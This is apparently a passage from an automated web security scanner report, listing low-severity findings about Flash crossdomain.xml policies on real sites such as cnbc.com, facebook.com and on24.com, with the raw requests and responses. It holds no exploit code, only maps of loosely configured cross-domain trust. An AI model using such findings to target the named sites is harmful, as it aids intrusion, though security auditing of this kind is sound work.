<allow-access-from domain="*.michaels.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.bonton.com" />
<allow-access-from domain="*.elder-beerman.com" />
<allow-access-from domain="*.carsons.com" />
<allow-access-from domain="*.bostonstore.com" />
<allow-access-from domain="*.younkers.com" />
<allow-access-from domain="*.parisian.com" />
<allow-access-from domain="*.herbergers.com" />
<allow-access-from domain="*.bergners.com" />
<allow-access-from domain="flyer.canadiantire.ca" />
<allow-access-from domain="circulaire.canadiantire.ca" />
<allow-access-from domain="cdn.uc.atwola.com" />
<allow-access-from domain="*.workalicious.com" />
<allow-access-from domain="*.liquidus.net" />
<allow-access-from domain="ec2-67-202-62-111.compute-1.amazonaws.com"/>
<allow-access-from domain="ec2-184-72-169-190.compute-1.amazonaws.com"/>
<allow-access-from domain="*.washingtonpost.com"/>
<allow-access-from domain="69.20.118.121" />
<allow-access-from domain="*.startribune.com" />
...[SNIP]...

4.86. http://data.cnbc.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://data.cnbc.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: data.cnbc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:07 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Wed, 01 Apr 2009 19:06:33 GMT
ETag: "12a-46683038a8040"
Accept-Ranges: bytes
Content-Type: application/xml
Via: 1.1 aicache6
Content-Length: 298
X-Aicache-OS: 64.210.194.245:80
Connection: Keep-Alive
Keep-Alive: max=20

<?xml version="1.0"?>

<cross-domain-policy>
<allow-access-from domain="www.cnbc.com" />
<allow-access-from domain="*.cnbc.com" />
<allow-access-from domain="www.msn.com" />
<allow-access-from domain="*.msn.com" />
...[SNIP]...

4.87. http://developers.facebook.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://developers.facebook.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: developers.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.136.154.104
Connection: close
Content-Length: 1527

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

4.88. http://disqus.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://disqus.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: disqus.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:32 GMT
Server: Apache
Vary: Cookie,Accept-Encoding
X-User: anon:608614822849
p3p: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Connection: close
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.usopen.org" to-ports="80,96" secure="false" />
...[SNIP]...

4.89. http://edge.sapient.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://edge.sapient.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: edge.sapient.com

Response

HTTP/1.0 200 OK
Content-Length: 588
Content-Type: text/xml
Last-Modified: Thu, 23 Apr 2009 19:45:38 GMT
Accept-Ranges: bytes
ETag: "5321c4134cc4c91:1edd"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: max-age=86400
Date: Tue, 06 Sep 2011 15:32:33 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"[]>
<cross-domain-policy>
<allow-access-from domain="*.sapient.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.sapientem.com" secure="false" />
...[SNIP]...
<allow-access-from domain="sapient.com.edgesuite.net" secure="false" />
...[SNIP]...
<allow-access-from domain="edge-dev.sapient.com" secure="false" />
...[SNIP]...
<allow-access-from domain="localhost" secure="false" />
...[SNIP]...

4.90. http://event.on24.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://event.on24.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: event.on24.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:40 GMT
Server: Apache
Last-Modified: Sat, 18 Jun 2011 00:37:19 GMT
Accept-Ranges: bytes
Content-Length: 3138
Connection: close
Content-Type: application/xml; charset=utf-8

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="i.cmpnet.com" />
<allow-access-from domain="www.ttglive.com" />
<allow-access-from domain="www.ddj.com" />
<allow-access-from domain="building.co.uk" />
<allow-access-from domain="http.earthcache.net" />
...[SNIP]...
<allow-access-from domain="webcast.on24.com" />
<allow-access-from domain="*.on24.com" />
<allow-access-from domain="a659.g.akamai.net" />

<allow-access-from domain="wcc.webeventservices.com" />
   <allow-access-from domain="event.meetingstream.com" />
   <allow-access-from domain="event.ciscowebseminars.com" />
   <allow-access-from domain="webcast.premiereglobal.com" />
<allow-access-from domain="event.cisco-live.com" />
<allow-access-from domain="*.cisco.com" />
<allow-access-from domain="*.cisco-live.com" />
   <allow-access-from domain="*.ciscolivevirtual.veplatform.com" />
   <allow-access-from domain="*.onlineseminarsolutions.com" />
   <allow-access-from domain="intelwc.on24.com" />

<allow-access-from domain="*.ogilvy.com" />
<allow-access-from domain="motifcdn2.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="motifcdn.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="ad.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m2.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m3.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m1.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m2.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.fr.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.se.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.de.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="event.webcast.meetyoo.de" secure="true" />
...[SNIP]...
<allow-access-from domain="webcast.acrobat.com" secure="true" />
...[SNIP]...
<allow-access-from domain="wccqa.webeventservices.com" />
   <allow-access-from domain="eventqa.meetingstream.com" />
   <allow-access-from domain="eventqa.ciscowebseminars.com" />
   <allow-access-from domain="webcastqa.premiereglobal.com" />

<allow-access-from domain="eventqa.webcast.meetyoo.de" secure="true" />
...[SNIP]...
<allow-access-from domain="webcastqa.acrobat.com" secure="true" />
...[SNIP]...
<allow-access-from domain="livestream.webex.com" secure="true" />
...[SNIP]...
<allow-access-from domain="event.vcallinteraction.com" secure="true" />
...[SNIP]...
<allow-access-from domain="eventqa.vcallinteraction.com" secure="true" />
...[SNIP]...
<allow-access-from domain="vshowqa.on24.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.inbfw.com"/>
   <allow-access-from domain="ciscovirtualevents.webex.com"/>
   <allow-access-from domain="vmc.lillypro.co.uk"/>

   <allow-access-from domain="on24.force.com" secure="true" />
...[SNIP]...

4.91. https://event.on24.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://event.on24.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: event.on24.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:41 GMT
Server: Apache
Last-Modified: Sat, 18 Jun 2011 00:37:19 GMT
Accept-Ranges: bytes
Content-Length: 3138
Connection: close
Content-Type: application/xml; charset=utf-8

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="i.cmpnet.com" />
<allow-access-from domain="www.ttglive.com" />
<allow-access-from domain="www.ddj.com" />
<allow-access-from domain="building.co.uk" />
<allow-access-from domain="http.earthcache.net" />
...[SNIP]...
<allow-access-from domain="webcast.on24.com" />
<allow-access-from domain="*.on24.com" />
<allow-access-from domain="a659.g.akamai.net" />

<allow-access-from domain="wcc.webeventservices.com" />
   <allow-access-from domain="event.meetingstream.com" />
   <allow-access-from domain="event.ciscowebseminars.com" />
   <allow-access-from domain="webcast.premiereglobal.com" />
<allow-access-from domain="event.cisco-live.com" />
<allow-access-from domain="*.cisco.com" />
<allow-access-from domain="*.cisco-live.com" />
   <allow-access-from domain="*.ciscolivevirtual.veplatform.com" />
   <allow-access-from domain="*.onlineseminarsolutions.com" />
   <allow-access-from domain="intelwc.on24.com" />

<allow-access-from domain="*.ogilvy.com" />
<allow-access-from domain="motifcdn2.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="motifcdn.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="ad.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m2.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m3.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m1.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m2.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.fr.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.se.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.de.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="event.webcast.meetyoo.de" secure="true" />
...[SNIP]...
<allow-access-from domain="webcast.acrobat.com" secure="true" />
...[SNIP]...
<allow-access-from domain="wccqa.webeventservices.com" />
   <allow-access-from domain="eventqa.meetingstream.com" />
   <allow-access-from domain="eventqa.ciscowebseminars.com" />
   <allow-access-from domain="webcastqa.premiereglobal.com" />

<allow-access-from domain="eventqa.webcast.meetyoo.de" secure="true" />
...[SNIP]...
<allow-access-from domain="webcastqa.acrobat.com" secure="true" />
...[SNIP]...
<allow-access-from domain="livestream.webex.com" secure="true" />
...[SNIP]...
<allow-access-from domain="event.vcallinteraction.com" secure="true" />
...[SNIP]...
<allow-access-from domain="eventqa.vcallinteraction.com" secure="true" />
...[SNIP]...
<allow-access-from domain="vshowqa.on24.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.inbfw.com"/>
   <allow-access-from domain="ciscovirtualevents.webex.com"/>
   <allow-access-from domain="vmc.lillypro.co.uk"/>

   <allow-access-from domain="on24.force.com" secure="true" />
...[SNIP]...

4.92. http://executivevision.cnbc.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://executivevision.cnbc.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: executivevision.cnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 31 May 2011 22:37:42 GMT
Accept-Ranges: bytes
ETag: "0ff4d5ae31fcc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:04:29 GMT
Connection: close
Content-Length: 3839

<?xml version="1.0"?>

<cross-domain-policy>
   <allow-access-from domain="nbcsports.com" />
   <allow-access-from domain="nbcsports.msnbc.com" />
   <allow-access-from domain="*.nbcsports.com" />
   <allow-access-from domain="*.nbcsports.msnbc.com" />
   <allow-access-from domain="*.msnbc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msnbc.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.ivillage.com " />
   <allow-access-from domain="i.ivillage.com" />
   <allow-access-from domain="devi.ivillage.com" />
   <allow-access-from domain="*.nbcuni.com " />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="msnbc-xpress" />
   <allow-access-from domain="www.cnbc.com"/>
   <allow-access-from domain="*.cnbc.com"/>
   <allow-access-from domain="widgets.nbcuni.com"/>
   <allow-access-from domain="*.thenbcagency.com"/>
   <allow-access-from domain="*.veoh.com"/>
   <allow-access-from domain="*.imeem.com"/>
   <allow-access-from domain="*.livejournal.com"/>
   <allow-access-from domain="*.vox.com"/>
   <allow-access-from domain="*.sixapart.com"/>
   <allow-access-from domain="*.reuters.com"/>
   <allow-access-from domain="*.real.com"/>
   <allow-access-from domain="*.akamai.net"/>
   <allow-access-from domain="*.atlasrichmedia.co.au"/>
   <allow-access-from domain="*.atlasrichmedia.co.uk"/>
   <allow-access-from domain="*.atlasrichmedia.com"/>
   <allow-access-from domain="*.atdmt.com"/>
   <allow-access-from domain="*.eyeblasterwiz.com"/>
   <allow-access-from domain="*.serving-sys.com"/>
   <allow-access-from domain="*.Abc.com"/>
   <allow-access-from domain="*.Abcnews.com"/>
   <allow-access-from domain="*.Accuweather.com"/>
   <allow-access-from domain="*.Cbs.com"/>
   <allow-access-from domain="*.cbsnews.com"/>
   <allow-access-from domain="*.discovery.com"/>
   <allow-access-from domain="*.ew.com"/>
   <allow-access-from domain="*.fox.com"/>
   <allow-access-from domain="*.foxnews.com"/>
   <allow-access-from domain="*.ign.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.tvguide.com"/>
   <allow-access-from domain="*.weather.com"/>
   <allow-access-from domain="*.vh1.com"/>
   <allow-access-from domain="*.usatoday.com"/>
   <allow-access-from domain="*.bmg.com"/>
   <allow-access-from domain="*.bmgmusic.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.fluid.nl"/>
   <allow-access-from domain="*.myspace.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.newsvine.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="64.207.156.207"/>
   <allow-access-from domain="*.msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-msn.com" />
   <allow-access-from domain="*.telemundo.com" />
<allow-access-from domain="*.unicornmedia.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.intellitxt.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="*.unicornmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornapp.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornmediabeta.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
<allow-access-from domain="*.pointroll.net" />
<allow-access-from domain="*.imwx.com" />
...[SNIP]...

4.93. http://js.adsonar.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://js.adsonar.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: js.adsonar.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 07 Apr 2009 17:58:21 GMT
ETag: "a3d-466fac2afc940"-gzip
Content-Type: application/xml
Cache-Control: max-age=1800
Expires: Tue, 06 Sep 2011 15:30:15 GMT
Date: Tue, 06 Sep 2011 15:00:15 GMT
Content-Length: 2621
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="assets.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.quigo.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lonelyplanet.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mochila.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.conxise.net" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="app.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="media.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.digitalcity.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="cdn-startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channels.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channel.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.web.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.my.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.news.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="iamalpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="imakealpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="aimcreate.mdat.aim.com:30100 " secure="false" />
...[SNIP]...
<allow-access-from domain="*.spinner.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.popeater.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.theboombox.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.opticalcortex.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.yourminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.facebook.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.liveminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.brightcove.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.lightningcast.com" to-ports="*" secure="false" />
...[SNIP]...

4.94. http://login.cnbc.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://login.cnbc.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: login.cnbc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:02:23 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Tue, 17 Mar 2009 16:47:10 GMT
ETag: "e0006-f5-4655351729f80"
Accept-Ranges: bytes
Content-Length: 245
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="www.cnbc.com" />
<allow-access-from domain="*.cnbc.com" />
<allow-access-from domain="www.msn.com" />
<allow-access-from domain="*.msn.com" />
...[SNIP]...

4.95. https://login.cnbc.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://login.cnbc.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: login.cnbc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:36 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Tue, 17 Mar 2009 16:47:10 GMT
ETag: "e0006-f5-4655351729f80"
Accept-Ranges: bytes
Content-Length: 245
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="www.cnbc.com" />
<allow-access-from domain="*.cnbc.com" />
<allow-access-from domain="www.msn.com" />
<allow-access-from domain="*.msn.com" />
...[SNIP]...

4.96. http://m.cnbc.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://m.cnbc.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: m.cnbc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: SESS93eea98f293ea8fd633599e480cddfdc=u6gvdrmr9fm9tr67nrb374c6c3; path=/; domain=.cnbc.com
Expires: 0
Last-Modified: Tue, 06 Sep 2011 15:04:46 GMT
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/xml
Via: 1.1 aicache6
Content-Length: 255
X-Aicache-OS: 64.210.193.252:80
Connection: Keep-Alive
Keep-Alive: max=20

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="m.cnbc.com" />
<allow-access-from domain="*.m.cnbc.com" />
...[SNIP]...

4.97. http://media.cnbc.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://media.cnbc.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: media.cnbc.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Tue, 31 May 2011 22:37:42 GMT
Accept-Ranges: bytes
ETag: "0ff4d5ae31fcc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 1168
Date: Tue, 06 Sep 2011 14:56:31 GMT
Connection: close
Cache-Control: public, max-age=900

<?xml version="1.0"?>

<cross-domain-policy>
   <allow-access-from domain="*.msnbc.com" />
   <allow-access-from domain="*.msn.com" />
   <allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="*.fluid.nl" />
   <allow-access-from domain="64.207.156.207" />
   <allow-access-from domain="msnbc-xpress" />
   <allow-access-from domain="*.s-msn.com" />
   <allow-access-from domain="*.telemundo.com" />
   <allow-access-from domain="*.pulse360.com" />
   <allow-access-from domain="*.context3.kanoodle.com" />
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.pointroll.net" />
<allow-access-from domain="*.imwx.com" />
...[SNIP]...

4.98. http://msnbcmedia.msn.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://msnbcmedia.msn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: msnbcmedia.msn.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:08:37 GMT
Last-Modified: Tue, 31 May 2011 22:37:42 GMT
Content-Type: text/xml
ETag: "0ff4d5ae31fcc1:0"
Accept-Ranges: bytes
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 1168
Connection: close

<?xml version="1.0"?>

<cross-domain-policy>
   <allow-access-from domain="*.msnbc.com" />
   <allow-access-from domain="*.msn.com" />
   <allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="*.fluid.nl" />
   <allow-access-from domain="64.207.156.207" />
   <allow-access-from domain="msnbc-xpress" />
   <allow-access-from domain="*.s-msn.com" />
   <allow-access-from domain="*.telemundo.com" />
   <allow-access-from domain="*.pulse360.com" />
   <allow-access-from domain="*.context3.kanoodle.com" />
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.pointroll.net" />
<allow-access-from domain="*.imwx.com" />
...[SNIP]...

4.99. http://optimized-by.rubiconproject.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: optimized-by.rubiconproject.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:05 GMT
Server: RAS/1.3 (Unix)
Last-Modified: Fri, 17 Sep 2010 22:21:19 GMT
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Accept-Ranges: bytes
Content-Length: 223
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.rubiconproject.com" />

...[SNIP]...

4.100. http://pagead2.googlesyndication.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://pagead2.googlesyndication.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Tue, 06 Sep 2011 00:01:39 GMT
Expires: Wed, 07 Sep 2011 00:01:39 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 53954
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
